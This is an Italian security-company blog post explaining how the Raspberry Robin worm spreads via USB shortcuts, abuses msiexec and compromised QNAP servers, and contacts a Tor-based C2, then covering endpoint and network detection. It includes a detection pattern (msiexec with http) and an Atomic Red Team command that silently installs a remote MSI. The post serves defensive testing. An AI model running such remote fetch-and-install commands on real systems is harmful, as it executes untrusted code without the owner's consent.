Raspberry Robin: come proteggersi

Pubblicato da frtg il

Provate ad immaginare una tipica giornata di lavoro d’ufficio, con i soliti spostamenti e una routine post-pandemia ancora da stabilire…un collega vi presta una sua chiavetta USB. La inserite per cercare di aprire la cartella, avete individuato la classica icona di Windows per l’apertura di collegamenti, doppio click e proseguite con le vostre attività…dopo quel click qualcosa è successo!
Raspberry Robin è il nome del Malware che ha appena compromesso il sistema…

Raspberry Robin Worm

A Maggio del 2022 è stato osservato per la prima volta un nuovo Worm, particolarmente evasivo, che si diffonde nelle reti private e aziendali attraverso chiavette USB compromesse.
A questo nuovo Worm è stato dato il nome “Raspberry Robin“.

I Worm che si propagano attraverso dispositivi USB non sono di certo nuove minacce e molto spesso, trattandosi di vecchi malware, le infrastrutture di comando e controllo risultano offline.

Raspberry Robin è invece una reale minaccia per la sicurezza delle Aziende in quanto:

  • è attivamente gestito dai criminali;
  • utilizza una sofisticata catena di compromissione per l’elusione della difesa;
  • viene utilizzato come ponte per attacchi di tipo Ransomware (fonte);
  • utilizza sistemi QNAP compromessi come infrastruttura C2 e rete TOR (The Onion Routing).

Proteggersi da una Compromissione

Come accennato in precedenza, il Malware arriva nell’infrastruttura tramite una iniziale compromissione di una Workstation per mezzo di un dispositivo USB.

Link per avvio compromissione Raspberry Robin

All’apertura del dispositivo USB viene mostrato alla vittima un classico collegamento Windows:

Il doppio click su quest’ultimo avvia la catena di compromissione mostrando a video la corretta apertura di una cartella di destinazione lanciando contemporaneamente in esecuzione una serie di comandi malevoli:

Cosa succede durante l'avvio della catena di compromissione del malware Raspberry Robin

Il primo comando malevolo ha la funzione di Downloader, viene sfruttato per l’effettivo download del malware Raspberry Robin:

Evidenza tecnica dell'esecuzione di comandi malevoli da cui proteggersi

Una particolarità del Malware è l’utilizzo di server QNAP precedentemente compromessi per poter distribuire il payload malevolo finale.

A questo punto, il download del payload finale completa la fase di compromissione ed avvia le comunicazioni con il server di comando e controllo tipicamente su rete TOR (The Onion Routing):

Grafico semplificato della catena di compromissione Raspberry Robin
Catena di compromissione – fonte

Metodi di rilevamento della minaccia

La difesa di un infrastruttura da una compromissione da malware Raspberry Robin può essere eseguita su diversi livelli.

Il primo metodo: Endpoint Security

Con una visibilità di tutti i sistemi aziendali, è possibile identificare questo genere di compromissione rilevando l’esecuzione di comandi sospetti. In questo caso l’identificazione del processo msiexec associato alla presenza della parola chiave http potrebbe essere un primo campanello d’allarme.

Testare la difesa:

E’ possibile simulare l’attività offensiva, per poter testare l’effettiva capacità difensiva dei sistemi per questo genere di compromissione, lanciando il comando (Test Atomic Red Team):

msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi"

Il secondo metodo: Network e Intelligence Feed

E’ possibile identificare una compromissione da malware Raspberry Robin e simili, utilizzando le informazioni acquisite dal network dell’azienda, seguendo due diversi approcci:

  • utilizzo di sistemi di tipo Intrusion Detection System:
    • in questo caso, se correttamente configurato, il sistema IDS dovrebbe possedere delle regole per l’identificazione del traffico malevolo facendo sniffing delle comunicazioni con il C2.

  • utilizzo di feed di Intelligence:
    • sfruttando le informazioni di feed di intelligence riguardanti i malware e i sistemi offensivi. Basta infatti correlare l’informazione di indirizzi IP e domini per identificare il traffico anomalo!

Attenzione! In questo caso, dal punto di vista difensivo, l’identificazione della minaccia avviene post-compromissione! Il sistema è già compromesso e si potrebbero avere impatti sulle informazioni del sistema vittima.

Difesa Fortgale

Fortgale si occupa della messa in sicurezza delle aziende da questo genere di minacce informatiche e compromissioni! Dalla difesa per attacchi Malware (Ransomware, Worm, Trojan e Spyware) alle compromissioni di sistemi perimetrali attraverso vulnerabilità applicative e sistemistiche.

Identifichiamo gli attaccanti dal primo momento in cui questi provano a muovere i primi passi nei sistemi e nelle reti dell’Azienda.

Con dei servizi specialistici pensati per le diverse caratteristiche aziendali, possiamo intervenire sui diversi aspetti della difesa.

Contatti: info@fortgale.com

La lista dei principali servizi Difensifi di Fortgale
Le statistiche delle principali attività svolte da Fortgale
I settori in cui operano i clienti Fortgale

Articoli esterni riguardanti Raspberry Robin: